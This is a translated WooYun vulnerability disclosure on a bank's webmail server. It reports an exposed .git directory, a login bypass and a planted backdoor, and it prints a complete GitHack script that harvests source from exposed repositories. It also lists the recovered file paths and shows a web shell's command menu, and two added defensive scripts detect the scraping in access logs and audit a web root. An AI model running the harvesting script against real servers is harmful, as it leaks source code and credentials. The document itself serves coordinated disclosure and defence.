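Vulnerability Summary
Bug ID: wooyun-2016-0167084
Title: Xiangtan Rural Commercial Bank mail service: improper operations configuration leads to sensitive information disclosure
Vendor: CNCERT (National Internet Emergency Center)
Author: 路人甲 (anonymous)
Submitted: 2016-01-05 00:46
Fixed: 2016-02-20 15:48
Published: 2016-02-20 15:48
Vulnerability type: System/service operations misconfiguration
Severity: High
Self-assessed Rank: 20
Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2016-01-05: Details sent to the vendor; awaiting vendor handling
2016-01-08: Vendor confirmed; details disclosed only to the vendor
2016-01-18: Details disclosed to core white hats and experts in related fields
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public
Brief description:
RT (see title)
Detailed description:
It seems to have been fixed; some files can no longer be downloaded.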
http://**.**.**.**/.git/config
http://**.**.**.**/.git/config
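Still, the password configuration and the like in the source code can be seen, though that is not much use. Some of it is intranet passwords and so on; I'm not interested in those.
GitHack: everyone has used this script. It never felt quite right to me, so I modified the code a little: whether or not a file can be downloaded, its file path is printed and saved. Then, on running into a scan
It turns out the login can be bypassed directly to get into the mailbox, and there is more sensitive information. I can't take screenshots on my laptop.
Proof of vulnerability:
The script; it saves the paths and file names in the current directory.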
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Python 2 script (GitHack, with the path-logging changes described above).

import sys
import urllib2
import os
import urlparse
import zlib
import threading
import Queue
import re
import time
from lib.parser import parse

if len(sys.argv) == 1:
    msg = """
A `.git` folder disclosure exploit. By LiJieJie
Usage: GitHack.py http://**.**.**.**/.git/
bug-report: my[at]**.**.**.** (http://www.**.**.**.**)
"""
    print msg
    sys.exit(0)


class Scanner(object):
    def __init__(self):
        self.base_url = sys.argv[-1]
        self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_')
        if not os.path.exists(self.domain):
            os.mkdir(self.domain)
        print '[+] Download and parse index file ...'
        data = self._request_data(sys.argv[-1] + '/index')
        with open('index', 'wb') as f:
            f.write(data)
        # Queue one (sha1, path) pair per entry in the git index.
        self.queue = Queue.Queue()
        for entry in parse('index'):
            if "sha1" in entry.keys():
                self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
                print entry['name']
        self.lock = threading.Lock()
        self.thread_count = 20
        self.STOP_ME = False

    def _request_data(self, url):
        request = urllib2.Request(url, None, {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'})
        return urllib2.urlopen(request).read()

    def _print(self, msg):
        self.lock.acquire()
        print msg
        self.lock.release()

    def get_back_file(self):
        while not self.STOP_ME:
            try:
                sha1, file_name = self.queue.get(timeout=0.5)
            except:
                break
            # Up to three attempts per object.
            for i in range(3):
                try:
                    folder = '/objects/%s/' % sha1[:2]
                    data = self._request_data(self.base_url + folder + sha1[2:])
                    data = zlib.decompress(data)
                    # Strip the loose-object header ("blob <size>\0").
                    data = re.sub('blob \d+\00', '', data)
                    target_dir = os.path.join(self.domain, os.path.dirname(file_name) )
                    if target_dir and not os.path.exists(target_dir):
                        os.makedirs(target_dir)
                    with open( os.path.join(self.domain, file_name) , 'wb') as f:
                        f.write(data)
                    # wooyun.txt: paths that were downloaded.
                    fs = open('wooyun.txt','a')
                    fs.write(file_name+'\n')
                    fs.close()
                    self._print('[OK] %s' % file_name)
                    break
                except urllib2.HTTPError, e:
                    if str(e).find('HTTP Error 404') >=0:
                        # wooyuns.txt: paths whose object returned 404.
                        fc = open('wooyuns.txt','a')
                        fc.write(file_name+'\n')
                        fc.close()
                        self._print('[File not found] %s' % file_name)
                        break
                except Exception, e:
                    # wooyunss.txt: paths that failed for any other reason.
                    fa = open('wooyunss.txt','a')
                    fa.write(file_name+'\n')
                    fa.close()
                    self._print('[Error] %s' % e)
        self.exit_thread()

    def exit_thread(self):
        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()

    def scan(self):
        for i in range(self.thread_count):
            t = threading.Thread(target=self.get_back_file)
            t.start()


s = Scanner()
s.scan()
try:
    while s.thread_count > 0:
        time.sleep(0.1)
except KeyboardInterrupt, e:
    s.STOP_ME = True
    time.sleep(1.0)
    print 'User Aborted.'
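
The request pattern the script above leaves in a web server's access log (one fetch of `/.git/index`, then many `/.git/objects/xx/...` fetches from the same client) can be detected and used to scope which objects were actually served. The following is an added example, not part of the original report: it assumes Combined Log Format, the threshold `min_objects` is an arbitrary choice, and the sample IPs and object ids are constructed.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format: client, identity, user, [time], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Any request below a .git directory.
GIT_ANY_RE = re.compile(r'/\.git(?:/|$)')
# Metadata files read before objects are fetched.
GIT_META_RE = re.compile(r'/\.git/+(?:index|config|HEAD|packed-refs)$')
# Loose object: /.git/objects/<2 hex>/<38 hex>; repeated slashes tolerated.
GIT_OBJECT_RE = re.compile(r'/\.git/+objects/+([0-9a-f]{2})/+([0-9a-f]{38})$')


def analyse(lines, min_objects=3):
    """Summarise /.git/ access per client and flag likely repository harvesting."""
    clients = defaultdict(lambda: {
        "requests": 0, "meta_served": set(),
        "objects_served": set(), "objects_denied": set(),
    })
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Drop the query string and decode %2e-style escapes before matching.
        path = unquote(m.group("path").split("?", 1)[0])
        if not GIT_ANY_RE.search(path):
            continue
        rec = clients[m.group("ip")]
        rec["requests"] += 1
        served = 200 <= int(m.group("status")) < 300
        obj = GIT_OBJECT_RE.search(path)
        if obj:
            key = "objects_served" if served else "objects_denied"
            rec[key].add(obj.group(1) + obj.group(2))
        elif served and GIT_META_RE.search(path):
            rec["meta_served"].add(path.rsplit("/", 1)[1])

    report = {}
    for ip, rec in clients.items():
        probed = len(rec["objects_served"]) + len(rec["objects_denied"])
        report[ip] = {
            "requests": rec["requests"],
            "meta_served": sorted(rec["meta_served"]),
            # Object ids that left the server: map them back to paths with
            # `git ls-files -s` in the real repository to scope the leak.
            "leaked_objects": sorted(rec["objects_served"]),
            "denied_objects": len(rec["objects_denied"]),
            # Index served, then several loose objects requested by the same client.
            "harvesting": "index" in rec["meta_served"] and probed >= min_objects,
        }
    return report


def sample_log():
    """Constructed log lines: documentation IPs and made-up object ids."""
    ua = "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)"
    ids = [hashlib.sha1(("constructed-%d" % i).encode()).hexdigest() for i in range(4)]

    def row(ip, path, status):
        return ('%s - - [05/Jan/2016:00:10:00 +0800] "GET %s HTTP/1.1" %d 512 "-" "%s"'
                % (ip, path, status, ua))

    lines = [row("203.0.113.7", "/.git//index", 200)]
    for i, sha in enumerate(ids):
        # The last object is not served, as after a partial fix.
        status = 404 if i == 3 else 200
        lines.append(row("203.0.113.7", "/.git//objects/%s/%s" % (sha[:2], sha[2:]), status))
    lines.append(row("198.51.100.20", "/webmail/index.php", 200))  # ordinary traffic
    lines.append(row("198.51.100.21", "/%2egit/config", 403))      # blocked probe
    return lines, ids


if __name__ == "__main__":
    log_lines, _ = sample_log()
    for client, summary in sorted(analyse(log_lines).items()):
        print(client, summary)
```

Any entry in `leaked_objects` for a file holding credentials means those credentials should be rotated, regardless of whether the `.git` directory has since been blocked.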
/webmail/api/sfun/secu.inc.php
/webmail/api/sfun/rsaclass.inc.php
/webmail/api/sfun/sfunRSA.inc.php
/webmail/config/config_inc.php
/webmail/config/dbremote.inc.php
/webmail/css/style2011_gray.css
/webmail/help/helpen_imap_android.html
/webmail/help/helpen_android.html
/webmail/help/mail_client_en.html
/webmail/images/ad/mail_xin.gif
/webmail/images/ad/1980319435.jpg
/webmail/include/api/todaymailbase.php
/webmail/include/fun_inc.php
/webmail/include/list_fun.inc.php
/webmail/include/prev_inc.php
/webmail/include/read_inc.php
/webmail/include/mail_fun.inc.php
/webmail/include/search_inc.php
/webmail/language/utf8_inc.php
/webmail/include/send_fun.php
/webmail/login.php
/webmail/logout.php
/webmail/main/addSpam.php
/webmail/language/utf8_en.inc.php
/webmail/language/utf8_big.inc.php
/webmail/main/advSearch.php
/webmail/language/utf8_gb.inc.php
/webmail/main/controlFolder.inc.php
/webmail/main/doAction.php
/webmail/main/concat.php
/webmail/main/default.php
/webmail/main/hello.php
/webmail/main/killself_send_form.inc.php
/webmail/main/list.php
/webmail/main/mailaddr.inc.php
/webmail/main/mime.php
/webmail/main/mailcurlapi.php
/webmail/main/list_search.php
/webmail/main/other_folders.php
/webmail/main/prev.php
/webmail/main/phpmanager.php
/webmail/main/prev_inc.php
/webmail/main/read_mail.php
/webmail/main/read.php
/webmail/main/send.php
/webmail/main/send_body.inc.php
/webmail/main/sendok.php
/webmail/main/send_form.inc.php
/webmail/main/sendmail.php
/webmail/main/sendstatusapi.php
/webmail/main/setlang.php
/webmail/main/uploadify.php
/webmail/mobile/agentxmlclient.inc.php
/webmail/mobile/sms_class.inc.php
/webmail/script/default.js
/webmail/script/date.js
/webmail/script/mailbox.js
/webmail/script/send.js
/webmail/setting/antispam.php
/
/webmail/setting/autorespond.php
/webmail/setting/filter.php
/webmail/setting/autorespond_submit.php
/webmail/setting/antivirus_submit.php
/webmail/setting/filter_submit.php
/webmail/setting/filteroption_submit.php
/webmail/setting/forward.php
/webmail/setting/forward_submit.php
/webmail/setting/setdefault.php
/webmail/setting/setsign.php
/webmail/setting/whitelist.php
/webmail/setting/uplogo.php
/webmail/tools/addNotice.php
/webmail/tools/add2addr.php
/webmail/tools/cardCmd.php
/webmail/tools/cardDetail.php
/webmail/tools/cardList.php
/webmail/tools/contactsImport.php
/webmail/tools/killself_cmd.php
/webmail/tools/noticeManage.php
/webmail/tools/pubaddr.php
/webmail/tools/readMail.php
/webmail/tools/sms.php
/webmail/vip/autorespond.php
/webmail/vip/filter.php
/webmail/vip/filter_set.php
/webmail/vip/filter_submit.php
/webmail/vip/forward.php
/webmail/vip/forward_submit.php
/webmail/vip/simpleTemplate.inc.php
/webmail/vip/whitelist.php
/webmail/tools/antiv.php
/
/
/webmail/template/default/index.html
/
/webmail/template/defaultnovip/index.html
/webmail/tools/add2card.php
/webmail/test.xml
/webmail/tools/antiv_submit.php
/webmail/tools/contacts_export.php
/webmail/tools/examples.csv
/webmail/tools/fanjianconvert.php
/webmail/tools/forgotPwd.php
/webmail/tools/getpopmail.php
/webmail/tools/forgotPwd_checkAns.php
/webmail/tools/forgotPwd_submit.php
/webmail/tools/killself_list.php
/webmail/tools/popmail.php
/webmail/tools/readNotice.php
/webmail/vip/antispam.php
/webmail/util.php
/webmail/vip/antispam_submit.php
/webmail/vip/antivirus.php
/webmail/vip/antivirus_submit.php
/webmail/vip/autorepondoff.inc.php
/webmail/vip/autorespond_submit.php
/webmail/vip/autorespondon.inc.php
/webmail/vip/filteroption.php
/webmail/vip/filteroption_submit.php
/webmail/vip/hktfilteroption.php
/
/webmail/vip/listsign.php
/webmail/vip/mfilter.txt
/webmail/vip/notvip.php
/webmail/vip/mfilter.php
/webmail/vip/notransmitinfo.inc.php
/webmail/vip/setpopmail.php
/webmail/vip/tmplemessage
/webmail/vip/sign.php
/webmail/vip/nofilteredinfo2.php
/webmail/vip/transmitinfo.inc.php
/webmail/vip/**.**.**.**
/x.php
/xml/upgrade.inc.php
/xml/index.php
/xml/backup.inc.php
/
/webmail/vip/login.php
/webmail/vip/setup.php
/webmail/script/cardDetail.js
**.**.**.** (**.**.**.**)
Charset:
Logout | File Manager | MYSQL Manager | Execute Command | PHP Variable | Port Scan | Security information | Eval PHP Code | Back Connect
Execute Command »
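The above is just the process. I have zero background in Python, and yet a friend asked me to write a script for him again. So annoying. Looking at the 遇见 scanner's results, some query statements were throwing errors, so I wanted to audit the code directly and see whether I could find an injection. Then I saw
/api/svn_host.php
I read it from the bottom up. The more I read, the more it felt like a backdoor, so I jumped straight to the top: password
OK, that's the end.
The process is not very detailed, sorry.
Sorry, I really can't take screenshots on this laptop.
It can be reproduced by following what I described.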
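Remediation:
Someone left a backdoor; be sure to remove it.
Unauthorized access (privilege bypass)
File upload
Git misconfiguration leading to source code disclosure; the fix is incomplete
Don't let the developers go home until it is properly fixed. (Just kidding.)
Please don't send anyone to my door.
Copyright notice: please credit the source when reposting: 路人甲@乌云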
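For the source-disclosure item in the remediation list, the following is an added example (not part of the original report, and not the vendor's code) of a check an administrator can run on the server's own file system to confirm that no version-control metadata or backup copies remain under the web root. The function names, the suffix list and the sample directory layout are assumptions constructed for illustration.

```python
import os
import tempfile

# Directory names that hold version-control metadata (assumed list).
VCS_DIRS = {".git", ".svn", ".hg"}
# File suffixes commonly left behind by editors and manual backups (assumed list).
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".swp", "~")


def audit_webroot(root):
    """Return sorted (category, relative_path) findings under a web root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for d in list(dirnames):
            if d in VCS_DIRS:
                rel = os.path.normpath(os.path.join(rel_dir, d))
                findings.append(("vcs-metadata", rel))
                dirnames.remove(d)  # report once, skip repository internals
        in_backup_dir = "bak" in rel_dir.lower().split(os.sep)
        for name in filenames:
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if name.lower().endswith(BACKUP_SUFFIXES):
                findings.append(("backup-copy", rel))
            elif in_backup_dir:
                findings.append(("backup-dir", rel))
    return sorted(findings)


def build_sample_tree(root):
    """Create a constructed sample layout (not data from the affected server)."""
    for rel in (".git/config", ".git/index", "webmail/login.php",
                "webmail/template/1/index.html.bak",
                "touch/share/bak/top.inc.2008-05-06.php"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("constructed sample\n")


def demo():
    """Audit the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit_webroot(root)


if __name__ == "__main__":
    for category, path in demo():
        print(f"{category:13} {path}")
```

Any `vcs-metadata` finding means the repository directory is still deployed alongside the application and should be removed from the web root or denied at the web server; the backup findings are files whose source the server may return as plain text.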
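Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2016-01-08 20:12
Vendor reply:
CNVD confirmed and reproduced the situation described. It has been forwarded via CNCERT to the authority responsible for banking-sector informatization, with a copy sent to the Hunan branch center to assist in handling; the branch will subsequently coordinate with the website's operator to handle it.
Latest status:
None yet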